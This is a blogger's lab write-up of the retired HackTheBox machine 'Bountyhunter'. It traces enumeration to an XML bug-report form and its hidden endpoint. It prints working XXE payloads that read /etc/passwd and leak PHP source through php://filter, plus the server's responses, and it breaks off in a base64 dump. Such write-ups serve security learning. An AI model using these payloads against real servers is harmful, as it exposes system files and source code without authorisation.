HackTheBox: Bountyhunter
01/13/2024
It's been a minute since I did a retired machine; Ive been spending most of my time doing CTFs for the last few weeks.
I believe the last box I did was [[devvortex]] when it came out, and right before that I got user flag on [[Clicker]], which was my first medium live box.
Enumeration
Im going to take it easy on notes for this one, and only record things that are actually noteworthy.
SSH and HTTP open.
Target running Ubuntu
Automated scans: - nikto - gobuster dirs - gobuster vhosts
Nikto
Nikto found /db.php
Gobuster Dirs
Gobuster VHOSTs
Manual Examination
We have a /portal.php page, which says portal is under development and has a link to a bounty tracker at log_submit.php
/log_submit
This page has a form with 4 fields: - exploit title - CWE - CVSS score - Bounty reward
The page source has a link to a js script "bountylog.js" with the following source:
js
function returnSecret(data) {
return Promise.resolve($.ajax({
type: "POST",
data: {"data":data},
url: "tracker_diRbPr00f314.php"
}));
}
async function bountySubmit() {
try {
var xml = `<?xml version="1.0" encoding="ISO-8859-1"?>
<bugreport>
<title>${$('#exploitTitle').val()}</title>
<cwe>${$('#cwe').val()}</cwe>PD94bWwgIHZlcnNpb249IjEuMCIgZW5jb2Rpbmc9IklTTy04ODU5LTEiPz4KPCFET0NUWVBFIGZvbyBbPCFFTlRJVFkgZXhhbXBsZSBTWVNURU0gIi9ldGMvcGFzc3dkIj4gXT4KCQk8YnVncmVwb3J0PgoJCTx0aXRsZT4mZXhhbXBsZTs8L3RpdGxlPgoJCTxjd2U+dGVzdDwvY3dlPgoJCTxjdnNzPnRlc3Q8L2N2c3M+CgkJPHJld2FyZD50ZXN0PC9yZXdhcmQ+CgkJPC9idWdyZXBvcnQ+
<cvss>${$('#cvss').val()}</cvss>
<reward>${$('#reward').val()}</reward>
</bugreport>`
let data = await returnSecret(btoa(xml));
$("#return").html(data)
}
catch(error) {
console.log('Error:', error);
}
}
If I navigate to this secret link at http://bountyhunter.htb/tracker_diRbPr00f314.php I get:
If DB were ready, would have added:
Title:
CWE:
Score:
Reward:
So we can see that the form is submitted to this secret function.
My question is, why is this function hidden? And why is it titled returnSecret()? What's secret about it?
Strange. Anyway, let's see if we can perform any injections here, either SQL or SSTI.
The payload ${{<%[%'"}}%\. does appear to break the system, as it does not echo back to us.
I dont know if I can use SQLmap here without a lot of fiddling, since there's no easy way to tell it when it has succeeded or failed.
Ill first figure out which character is breaking the form, and if that doesnt point me in the right direction ill try to figure out sqlmap.
Evidently its the < character; this may be because it is sending the data as xml to the secret function.
How do we abuse promise.resolve()?
Let's send arbitrary xml to the endpoint and see what happens. If it gives us an error message it might help us figure out what's going on.
PD94bWwgIHZlcnNpb249IjEuMCIgZW5jb2Rpbmc9IklTTy04ODU5LTEiPz4KCQk8YnVncmVwb3J0PgoJCTx0aXRsZT5hbGVydCgndGVzdCcpPC90aXRsZT4KCQk8Y3dlPnRlc3Q8L2N3ZT4KCQk8bWFkZXVwZmllbGQ%2bdGVzdDwvbWFkZXVwZmllbGQ%2bCgkJPGN2c3M%2bdGVzdDwvY3Zzcz4KCQk8cmV3YXJkPnRlc3Q8L3Jld2FyZD4KCQk8L2J1Z3JlcG9ydD4%3d
XXE Attack
Holy SHIT! I just did XXE! Using the payload
xml
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [<!ENTITY example SYSTEM "/etc/passwd"> ]>
<bugreport>
<title>&example;</title>
<cwe>test</cwe>
<cvss>test</cvss>
<reward>test</reward>
</bugreport>
instead of
xml
<?xml version="1.0" encoding="ISO-8859-1"?>
<bugreport>
<title>test</title>
<cwe>test</cwe>
<cvss>test</cvss>
<reward>test</reward>
</bugreport>
gets the /etc/passwd file:
http
HTTP/1.1 200 OK
Date: Sun, 03 Dec 2023 21:05:19 GMT
Server: Apache/2.4.41 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 2102
Connection: close
Content-Type: text/html; charset=UTF-8
If DB were ready, would have added:
<table>
<tr>
<td>Title:</td>
<td>root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
sshd:x:111:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
development:x:1000:1000:Development:/home/development:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
usbmux:x:112:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
</td>
</tr>
<tr>
<td>CWE:</td>
<td>test</td>
</tr>
<tr>
<td>Score:</td>
<td>test</td>
</tr>
<tr>
<td>Reward:</td>
<td>test</td>
</tr>
</table>
Hell yeah. So we can do XXE. This is the first time Ive ever come across this, so I have to see what you can use it for.
It looks like it might only be good for LFI. Let's see if we can leak the page source code:
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [<!ENTITY example SYSTEM "php://filter/convert.base64-encode/resource=index.php"> ]>
<bugreport>
<title>&example;</title>
<cwe>test</cwe>
<cvss>test</cvss>
<reward>test</reward>
</bugreport>
Note that Im showing the decoded payload, not what actually gets sent to the site. Before sending you have to base64 encode it and then url encode it.
and here we go:
http
HTTP/1.1 200 OK
Date: Sun, 03 Dec 2023 21:25:58 GMT
Server: Apache/2.4.41 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 33820
Connection: close
Content-Type: text/html; charset=UTF-8
If DB were ready, would have added:
<table>
<tr>
<td>Title:</td>
<td>PCFET0NUWVBFIGh0bWw+CjxodG1sIGxhbmc9ImVuIj4KICAgIDxoZWFkPgogICAgICAgIDxtZXRhIGNoYXJzZXQ9InV0Zi04IiAvPgogICAgICAgIDxtZXRhIG5hbWU9InZpZXdwb3J0IiBjb250ZW50PSJ3aWR0aD1kZXZpY2Utd2lkdGgsIGluaXRpYWwtc2NhbGU9MSwgc2hyaW5rLXRvLWZpdD1ubyIgLz4KICAgICAgICA8bWV0YSBuYW1lPSJkZXNjcmlwdGlvbiIgY29udGVudD0iIiAvPgogICAgICAgIDxtZXRhIG5hbWU9ImF1dGhvciIgY29udGVudD0iIiAvPgogICAgICAgIDx0aXRsZT5Cb3VudHkgSHVudGVyczwvdGl0bGU+CiAgICAgICAgPCEtLSBGYXZpY29uLS0+CiAgICAgICAgPGxpbmsgcmVsPSJpY29uIiB0eXBlPSJpbWFnZS94LWljb24iIGhyZWY9ImFzc2V0cy9pbWcvZmF2aWNvbi5pY28iIC8+CiAgICAgICAgPCEtLSBGb250IEF3ZXNvbWUgaWNvbnMgKGZyZWUgdmVyc2lvbiktLT4KICAgICAgICA8c2NyaXB0IHNyYz0iL3Jlc291cmNlcy9hbGwuanMiPjwvc2NyaXB0PgogICAgICAgIDwhLS0gR29vZ2xlIGZvbnRzLS0+CiAgICAgICAgPGxpbmsgaHJlZj0iL3Jlc291cmNlcy9tb25zdGVyYXQuY3NzIiByZWw9InN0eWxlc2hlZXQiIHR5cGU9InRleHQvY3NzIiAvPgogICAgICAgIDxsaW5rIGhyZWY9Ii9yZXNvdXJjZXMvbGF0by5jc3MiIHJlbD0ic3R5bGVzaGVldCIgdHlwZT0idGV4dC9jc3MiIC8+CiAgICAgICAgPCEtLSBDb3JlIHRoZW1lIENTUyAoaW5jbHVkZXMgQm9vdHN0cmFwKS0tPgogICAgICAgIDxsaW5rIGhyZWY9ImNzcy9zdHlsZXMuY3NzIiByZWw9InN0eWxlc2hlZXQiIC8+CiAgICA8L2hlYWQ+CiAgICA8Ym9keSBpZD0icGFnZS10b3AiPgogICAgICAgIDwhLS0gTmF2aWdhdGlvbi0tPgogICAgICAgIDxuYXYgY2xhc3M9Im5hdmJhciBuYXZiYXItZXhwYW5kLWxnIGJnLXNlY29uZGFyeSB0ZXh0LXVwcGVyY2FzZSBmaXhlZC10b3AiIGlkPSJtYWluTmF2Ij4KICAgICAgICAgICAgPGRpdiBjbGFzcz0iY29udGFpbmVyIj4KICAgICAgICAgICAgICAgIDxhIGNsYXNzPSJuYXZiYXItYnJhbmQganMtc2Nyb2xsLXRyaWdnZXIiIGhyZWY9IiNwYWdlLXRvcCI+Qm91bnR5IEh1bnRlcnM8L2E+CiAgICAgICAgICAgICAgICA8YnV0dG9uIGNsYXNzPSJuYXZiYXItdG9nZ2xlciBuYXZiYXItdG9nZ2xlci1yaWdodCB0ZXh0LXVwcGVyY2FzZSBmb250LXdlaWdodC1ib2xkIGJnLXByaW1hcnkgdGV4dC13aGl0ZSByb3VuZGVkIiB0eXBlPSJidXR0b24iIGRhdGEtdG9nZ2xlPSJjb2xsYXBzZSIgZGF0YS10YXJnZXQ9IiNuYXZiYXJSZXNwb25zaXZlIiBhcmlhLWNvbnRyb2xzPSJuYXZiYXJSZXNwb25zaXZlIiBhcmlhLWV4cGFuZGVkPSJmYWxzZSIgYXJpYS1sYWJlbD0iVG9nZ2xlIG5hdmlnYXRpb24iPgogICAgICAgICAgICAgICAgICAgIE1lbnUKICAgICAgICAgICAgICAgICAgICA8aSBjbGFzcz0iZmFzIGZhLWJhcnMiPjwvaT4KICAgICAgICAgICAgICAgIDwvYnV0dG9uPgogICAgICAgICAgICAgICAgPGRpdiBjbGFzcz0iY29sbGFwc2UgbmF2YmFyLWNvbGxhcHNlIiBpZD0ibmF2YmFyUmVzcG9uc2l2ZSI+CiAgICAgICAgICAgICAgICAgICAgPHVsIGNsYXNzPSJuYXZiYXItbmF2IG1sLWF1dG8iPgogICAgICAgICAgICAgICAgICAgICAgICA8bGkgY2xhc3M9Im5hdi1pdGVtIG14LTAgbXgtbGctMSI+PGEgY2xhc3M9Im5hdi1saW5rIHB5LTMgcHgtMCBweC1sZy0zIHJvdW5kZWQganMtc2Nyb2xsLXRyaWdnZXIiIGhyZWY9IiNhYm91dCI+QWJvdXQ8L2E+PC9saT4KICAgICAgICAgICAgICAgICAgICAgICAgPGxpIGNsYXNzPSJuYXYtaXRlbSBteC0wIG14LWxnLTEiPjxhIGNsYXNzPSJuYXYtbGluayBweS0zIHB4LTAgcHgtbGctMyByb3VuZGVkIGpzLXNjcm9sbC10cmlnZ2VyIiBocmVmPSIjY29udGFjdCI+Q29udGFjdDwvYT48L2xpPgogICAgICAgICAgICAgICAgICAgICAgICA8bGkgY2xhc3M9Im5hdi1pdGVtIG14LTAgbXgtbGctMSI+PGEgY2xhc3M9Im5hdi1saW5rIHB5LTMgcHgtMCBweC1sZy0zIHJvdW5kZWQganMtc2Nyb2xsLXRyaWdnZXIiIGhyZWY9InBvcnRhbC5waHAiPlBvcnRhbDwvYT48L2xpPgogICAgICAgICAgICAgICAgICAgIDwvdWw+CiAgICAgICAgICAgICAgICA8L2Rpdj4KICAgICAgICAgICAgPC9kaXY+CiAgICAgICAgPC9uYXY+CiAgICAgICAgPCEtLSBNYXN0aGVhZC0tPgogICAgICAgIDxoZWFkZXIgY2xhc3M9Im1hc3RoZWFkIGJnLXByaW1hcnkgdGV4dC13aGl0ZSB0ZXh0LWNlbnRlciI+CiAgICAgICAgICAgIDxkaXYgY2xhc3M9ImNvbnRhaW5lciBkLWZsZXggYWxpZ24taXRlbXMtY2VudGVyIGZsZXgtY29sdW1uIj4KICAgICAgICAgICAgICAgIDwhLS0gTWFzdGhlYWQgQXZhdGFyIEltYWdlLS0+CiAgICAgICAgICAgICAgICA8aW1nIGNsYXNzPSJtYXN0aGVhZC1hdmF0YXIgbWItNSIgc3JjPSJhc3NldHMvaW1nL2F2YXRhYWFycy5zdmciIGFsdD0iIiAvPgogICAgICAgICAgICAgICAgPCEtLSBNYXN0aGVhZCBIZWFkaW5nLS0+CiAgICAgICAgICAgICAgICA8aDEgY2xhc3M9Im1hc3RoZWFkLWhlYWRpbmcgdGV4dC11cHBlcmNhc2UgbWItMCI+VGhlIEIgVGVhbTwvaDE+CiAgICAgICAgICAgICAgICA8IS0tIEljb24gRGl2aWRlci0tPgogICAgICAgICAgICAgICAgPGRpdiBjbGFzcz0iZGl2aWRlci1jdXN0b20gZGl2aWRlci1saWdodCI+CiAgICAgICAgICAgICAgICAgICAgPGRpdiBjbGFzcz0iZGl2aWRlci1jdXN0b20tbGluZSI+PC9kaXY+CiAgICAgICAgICAgICAgICAgICAgPGRpdiBjbGFzcz0iZGl2aWRlci1jdXN0b20taWNvbiI+PGkgY2xhc3M9ImZhcyBmYS1zdGFyIj48L2k+PC9kaXY+CiAgICAgICAgICAgICAgICAgICAgPGRpdiBjbGFzcz0iZGl2aWRlci1jdXN0b20tbGluZSI+PC9kaXY+CiAgICAgICAgICAgICAgICA8L2Rpdj4KICAgICAgICAgICAgICAgIDwhLS0gTWFzdGhlYWQgU3ViaGVhZGluZy0tPgogICAgICAgICAgICAgICAgPHAgY2xhc3M9Im1hc3RoZWFkLXN1YmhlYWRpbmcgZm9udC13ZWlnaHQtbGlnaHQgbWItMCI+Qm91bnR5IEh1bnRlcnMgLSBTZWN1cml0eSBSZXNlYXJjaGVycyAtIENhbiB1c2UgQnVycDwvcD4KICAgICAgICAgICAgPC9kaXY+CiAgICAgICAgPC9oZWFkZXI+CiAgICAgICAgPCEtLSBBYm91dCBTZWN0aW9uLS0+CiAgICAgICAgPHNlY3Rpb24gY2xhc3M9InBhZ2Utc2VjdGlvbiBiZy1wcmltYXJ5IHRleHQtd2hpdGUgbWItMCIgaWQ9ImFib3V0Ij4KICAgICAgICAgICAgPGRpdiBjbGFzcz0iY29udGFpbmVyIj4KICAgICAgICAgICAgICAgIDwhLS0gQWJvdXQgU2VjdGlvbiBIZWFkaW5nLS0+CiAgICAgICAgICAgICAgICA8aDIgY2xhc3M9InBhZ2Utc2VjdGlvbi1oZWFkaW5nIHRleHQtY2VudGVyIHRleHQtdXBwZXJjYXNlIHRleHQtd2hpdGUiPkFib3V0IFVzPC9oMj4KICAgICAgICAgICAgICAgIDwhLS0gSWNvbiBEaXZpZGVyLS0+CiAgICAgICAgICAgICAgICA8ZGl2IGNsYXNzPSJkaXZpZGVyLWN1c3RvbSBkaXZpZGVyLWxpZ2h0Ij4KICAgICAgICAgICAgICAgICAgICA8ZGl2IGNsYXNzPSJkaXZpZGVyLWN1c3RvbS1saW5lIj48L2Rpdj4KICAgICAgICAgICAgICAgICAgICA8ZGl2IGNsYXNzPSJkaXZpZGVyLWN1c3RvbS1pY29uIj48aSBjbGFzcz0iZmFzIGZhLXN0YXIiPjwvaT48L2Rpdj4KICAgICAgICAgICAgICAgICAgICA8ZGl2IGNsYXNzPSJkaXZpZGVyLWN1c3RvbS1saW5lIj48L2Rpdj4KICAgICAgICAgICAgICAgIDwvZGl2PgogICAgICAgICAgICAgICAgPCEtLSBBYm91dCBTZWN0aW9uIENvbnRlbnQtLT4KICAgICAgICAgICAgICAgIDxkaXYgY2xhc3M9InJvdyI+CiAgICAgICAgICAgICAgICAgICAgPGRpdiBjbGFzcz0iY29sLWxnLTQgbWwtYXV0byI+PHAgY2xhc3M9ImxlYWQiPldlIGFyZSBhIHRlYW0gb2YgYnVnIGJvdW50eSBodW50ZXJzIGxvb2tpbmcgZm9yIGNsaWVudHMuIFBsZWFzZSBjb250YWN0IHVzIGlmIHlvdSBhcmUgaW50ZXJlc3RlZCBpbiBoaXJpbmcgdXMuPC9wPjwvZGl2PgogICAgICAgICAgICAgICAgICAgIDxkaXYgY2xhc3M9ImNvbC1sZy00IG1yLWF1dG8iPjxwIGNsYXNzPSJsZWFkIj5XZSBoYXZlIGZvdW5kIGFuZCBwdWJsaXNoZWQgbnVtZXJvdXMgZXhwbG9pdHMuIE9uZSBvZiBvdXIgbWVtYmVycyBldmVuIGtub3dzIGJ1ZmZlciBvdmVyZmxvd3MhPC9wPjwvZGl2PgogICAgICAgICAgICAgICAgPC9kaXY+CiAgICAgICAgICAgICAgICA8IS0tIEFib3V0IFNlY3Rpb24gQnV0dG9uLS0+CiAgICAgICAgICAgICAgICA8ZGl2IGNsYXNzPSJ0ZXh0LWNlbnRlciBtdC00Ij4KICAgICAgICAgICAgICAgICAgICA8YSBjbGFzcz0iYnRuIGJ0bi14bCBidG4tb3V0bGluZS1saWdodCIgaHJlZj0iIj4KICAgICAgICAgICAgICAgICAgICAgICAgPGkgY2xhc3M9ImZhcyBmYS1kb3dubG9hZCBtci0yIj48L2k+CiAgICAgICAgICAgICAgICAgICAgICAgIERvd25sb2FkIG91ciBwcmljaW5nIGd1aWRlLgogICAgICAgICAgICAgICAgICAgIDwvYT4KICAgICAgICAgICAgICAgIDwvZGl2PgogICAgICAgICAgICA8L2Rpdj4KICAgICAgICA8L3NlY3Rpb24+CiAgICAgICAgPCEtLSBDb250YWN0IFNlY3Rpb24tLT4KICAgICAgICA8c2VjdGlvbiBjbGFzcz0icGFnZS1zZWN0aW9uIiBpZD0iY29udGFjdCI+CiAgICAgICAgICAgIDxkaXYgY2xhc3M9ImNvbnRhaW5lciI+CiAgICAgICAgICAgICAgICA8IS0tIENvbnRhY3QgU2VjdGlvbiBIZWFkaW5nLS0+CiAgICAgICAgICAgICAgICA8aDIgY2xhc3M9InBhZ2Utc2VjdGlvbi1oZWFkaW5nIHRleHQtY2VudGVyIHRleHQtdXBwZXJjYXNlIHRleHQtc2Vjb25kYXJ5IG1iLTAiPkNvbnRhY3QgVXM8L2gyPgogICAgICAgICAgICAgICAgPCEtLSBJY29uIERpdmlkZXItLT4KICAgICAgICAgICAgICAgIDxkaXYgY2xhc3M9ImRpdmlkZXItY3VzdG9tIj4KICAgICAgICAgICAgICAgICAgICA8ZGl2IGNsYXNzPSJkaXZpZGVyLWN1c3RvbS1saW5lIj48L2Rpdj4KICAgICAgICAgICAgICAgICAgICA8ZGl2IGNsYXNzPSJkaXZpZGVyLWN1c3RvbS1pY29uIj48aSBjbGFzcz0iZmFzIGZhLXN0YXIiPjwvaT48L2Rpdj4KICAgICAgICAgICAgICAgICAgICA8ZGl2IGNsYXNzPSJkaXZpZGVyLWN1c3RvbS1saW5lIj48L2Rpdj4KICAgICAgICAgICAgICAgIDwvZGl2PgogICAgICAgICAgICAgICAgPCEtLSBDb250YWN0IFNlY3Rpb24gRm9ybS0tPgogICAgICAgICAgICAgICAgPGRpdiBjbGFzcz0icm93Ij4KICAgICAgICAgICAgICAgICAgICA8ZGl2IGNsYXNzPSJjb2wtbGctOCBteC1hdXRvIj4KICAgICAgICAgICAgICAgICAgICAgICAgPCEtLSBUbyBjb25maWd1cmUgdGhlIGNvbnRhY3QgZm9ybSBlbWFpbCBhZGRyZXNzLCBnbyB0byBtYWlsL2NvbnRhY3RfbWUucGhwIGFuZCB1cGRhdGUgdGhlIGVtYWlsIGFkZHJlc3MgaW4gdGhlIFBIUCBmaWxlIG9uIGxpbmUgMTkuLS0+CiAgICAgICAgICAgICAgICAgICAgICAgIDxmb3JtIGlkPSJjb250YWN0Rm9ybSIgbmFtZT0ic2VudE1lc3NhZ2UiIG5vdmFsaWRhdGU9Im5vdmFsaWRhdGUiPgogICAgICAgICAgICAgICAgICAgICAgICAgICAgPGRpdiBjbGFzcz0iY29udHJvbC1ncm91cCI+CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPGRpdiBjbGFzcz0iZm9ybS1ncm91cCBmbG9hdGluZy1sYWJlbC1mb3JtLWdyb3VwIGNvbnRyb2xzIG1iLTAgcGItMiI+CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDxsYWJlbD5OYW1lPC9sYWJlbD4KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPGlucHV0IGNsYXNzPSJmb3JtLWNvbnRyb2wiIGlkPSJuYW1lIiB0eXBlPSJ0ZXh0IiBwbGFjZWhvbGRlcj0iTmFtZSIgcmVxdWlyZWQ9InJlcXVpcmVkIiBkYXRhLXZhbGlkYXRpb24tcmVxdWlyZWQtbWVzc2FnZT0iUGxlYXNlIGVudGVyIHlvdXIgbmFtZS4iIC8+CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwIGNsYXNzPSJoZWxwLWJsb2NrIHRleHQtZGFuZ2VyIj48L3A+CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9kaXY+CiAgICAgICAgICAgICAgICAgICAgICAgICAgICA8L2Rpdj4KICAgICAgICAgICAgICAgICAgICAgICAgICAgIDxkaXYgY2xhc3M9ImNvbnRyb2wtZ3JvdXAiPgogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDxkaXYgY2xhc3M9ImZvcm0tZ3JvdXAgZmxvYXRpbmctbGFiZWwtZm9ybS1ncm91cCBjb250cm9scyBtYi0wIHBiLTIiPgogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8bGFiZWw+RW1haWwgQWRkcmVzczwvbGFiZWw+CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDxpbnB1dCBjbGFzcz0iZm9ybS1jb250cm9sIiBpZD0iZW1haWwiIHR5cGU9ImVtYWlsIiBwbGFjZWhvbGRlcj0iRW1haWwgQWRkcmVzcyIgcmVxdWlyZWQ9InJlcXVpcmVkIiBkYXRhLXZhbGlkYXRpb24tcmVxdWlyZWQtbWVzc2FnZT0iUGxlYXNlIGVudGVyIHlvdXIgZW1haWwgYWRkcmVzcy4iIC8+CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwIGNsYXNzPSJoZWxwLWJsb2NrIHRleHQtZGFuZ2VyIj48L3A+CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9kaXY+CiAgICAgICAgICAgICAgICAgICAgICAgICAgICA8L2Rpdj4KICAgICAgICAgICAgICAgICAgICAgICAgICAgIDxkaXYgY2xhc3M9ImNvbnRyb2wtZ3JvdXAiPgogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDxkaXYgY2xhc3M9ImZvcm0tZ3JvdXAgZmxvYXRpbmctbGFiZWwtZm9ybS1ncm91cCBjb250cm9scyBtYi0wIHBiLTIiPgogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8bGFiZWw+UGhvbmUgTnVtYmVyPC9sYWJlbD4KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPGlucHV0IGNsYXNzPSJmb3JtLWNvbnRyb2wiIGlkPSJwaG9uZSIgdHlwZT0idGVsIiBwbGFjZWhvbGRlcj0iUGhvbmUgTnVtYmVyIiByZXF1aXJlZD0icmVxdWlyZWQiIGRhdGEtdmFsaWRhdGlvbi1yZXF1aXJlZC1tZXNzYWdlPSJQbGVhc2UgZW50ZXIgeW91ciBwaG9uZSBudW1iZXIuIiAvPgogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8cCBjbGFzcz0iaGVscC1ibG9jayB0ZXh0LWRhbmdlciI+PC9wPgogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvZGl2PgogICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9kaXY+CiAgICAgICAgICAgICAgICAgICAgICAgICAgICA8ZGl2IGNsYXNzPSJjb250cm9sLWdyb3VwIj4KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8ZGl2IGNsYXNzPSJmb3JtLWdyb3VwIGZsb2F0aW5nLWxhYmVsLWZvcm0tZ3JvdXAgY29udHJvbHMgbWItMCBwYi0yIj4KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPGxhYmVsPk1lc3NhZ2U8L2xhYmVsPgogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8dGV4dGFyZWEgY2xhc3M9ImZvcm0tY29udHJvbCIgaWQ9Im1lc3NhZ2UiIHJvd3M9IjUiIHBsYWNlaG9sZGVyPSJNZXNzYWdlIiByZXF1aXJlZD0icmVxdWlyZWQiIGRhdGEtdmFsaWRhdGlvbi1yZXF1aXJlZC1tZXNzYWdlPSJQbGVhc2UgZW50ZXIgYSBtZXNzYWdlLiI+PC90ZXh0YXJlYT4KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPHAgY2xhc3M9ImhlbHAtYmxvY2sgdGV4dC1kYW5nZXIiPjwvcD4KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8L2Rpdj4KICAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvZGl2PgogICAgICAgICAgICAgICAgICAgICAgICAgICAgPGJyIC8+CiAgICAgICAgICAgICAgICAgICAgICAgICAgICA8ZGl2IGlkPSJzdWNjZXNzIj48L2Rpdj4KICAgICAgICAgICAgICAgICAgICAgICAgICAgIDxkaXYgY2xhc3M9ImZvcm0tZ3JvdXAiPjxidXR0b24gY2xhc3M9ImJ0biBidG4tcHJpbWFyeSBidG4teGwiIGlkPSJzZW5kTWVzc2FnZUJ1dHRvbiIgdHlwZT0ic3VibWl0Ij5TZW5kPC9idXR0b24+PC9kaXY+CiAgICAgICAgICAgICAgICAgICAgICAgIDwvZm9ybT4KICAgICAgICAgICAgICAgICAgICA8L2Rpdj4KICAgICAgICAgICAgICAgIDwvZGl2PgogICAgICAgICAgICA8L2Rpdj4KICAgICAgICA8L3NlY3Rpb24+CiAgICAgICAgPCEtLSBGb290ZXItLT4KICAgICAgICA8Zm9vdGVyIGNsYXNzPSJmb290ZXIgdGV4dC1jZW50ZXIiPgogICAgICAgICAgICA8ZGl2IGNsYXNzPSJjb250YWluZXIiPgogICAgICAgICAgICAgICAgPGRpdiBjbGFzcz0icm93Ij4KICAgICAgICAgICAgICAgICAgICA8IS0tIEZvb3RlciBMb2NhdGlvbi0tPgogICAgICAgICAgICAgICAgICAgIDxkaXYgY2xhc3M9ImNvbC1sZy00IG1iLTUgbWItbGctMCI+CiAgICAgICAgICAgICAgICAgICAgICAgIDxoNCBjbGFzcz0idGV4dC11cHBlcmNhc2UgbWItNCI+TG9jYXRpb248L2g0PgogICAgICAgICAgICAgICAgICAgICAgICA8cCBjbGFzcz0ibGVhZCBtYi0wIj4KICAgICAgICAgICAgICAgICAgICAgICAgICAgIDEwMTkgU2t5dHJhaW4gV2F5CiAgICAgICAgICAgICAgICAgICAgICAgICAgICA8YnIgLz4KICAgICAgICAgICAgICAgICAgICAgICAgICAgIFZhbmNvdXZlciwgQkMgVjRBMUU0CiAgICAgICAgICAgICAgICAgICAgICAgIDwvcD4KICAgICAgICAgICAgICAgICAgICA8L2Rpdj4KICAgICAgICAgICAgICAgICAgICA8IS0tIEZvb3RlciBTb2NpYWwgSWNvbnMtLT4KICAgICAgICAgICAgICAgICAgICA8ZGl2IGNsYXNzPSJjb2wtbGctNCBtYi01IG1iLWxnLTAiPgogICAgICAgICAgICAgICAgICAgICAgICA8aDQgY2xhc3M9InRleHQtdXBwZXJjYXNlIG1iLTQiPkFyb3VuZCB0aGUgV2ViPC9oND4KICAgICAgICAgICAgICAgICAgICAgICAgPGEgY2xhc3M9ImJ0biBidG4tb3V0bGluZS1saWdodCBidG4tc29jaWFsIG14LTEiIGhyZWY9IiMhIj48aSBjbGFzcz0iZmFiIGZhLWZ3IGZhLWZhY2Vib29rLWYiPjwvaT48L2E+CiAgICAgICAgICAgICAgICAgICAgICAgIDxhIGNsYXNzPSJidG4gYnRuLW91dGxpbmUtbGlnaHQgYnRuLXNvY2lhbCBteC0xIiBocmVmPSIjISI+PGkgY2xhc3M9ImZhYiBmYS1mdyBmYS10d2l0dGVyIj48L2k+PC9hPgogICAgICAgICAgICAgICAgICAgICAgICA8YSBjbGFzcz0iYnRuIGJ0bi1vdXRsaW5lLWxpZ2h0IGJ0bi1zb2NpYWwgbXgtMSIgaHJlZj0iIyEiPjxpIGNsYXNzPSJmYWIgZmEtZncgZmEtbGlua2VkaW4taW4iPjwvaT48L2E+CiAgICAgICAgICAgICAgICAgICAgICAgIDxhIGNsYXNzPSJidG4gYnRuLW91dGxpbmUtbGlnaHQgYnRuLXNvY2lhbCBteC0xIiBocmVmPSIjISI+PGkgY2xhc3M9ImZhYiBmYS1mdyBmYS1kcmliYmJsZSI+PC9pPjwvYT4KICAgICAgICAgICAgICAgICAgICA8L2Rpdj4KICAgICAgICAgICAgICAgICAgICA8IS0tIEZvb3RlciBBYm91dCBUZXh0LS0+CiAgICAgICAgICAgICAgICAgICAgPGRpdiBjbGFzcz0iY29sLWxnLTQi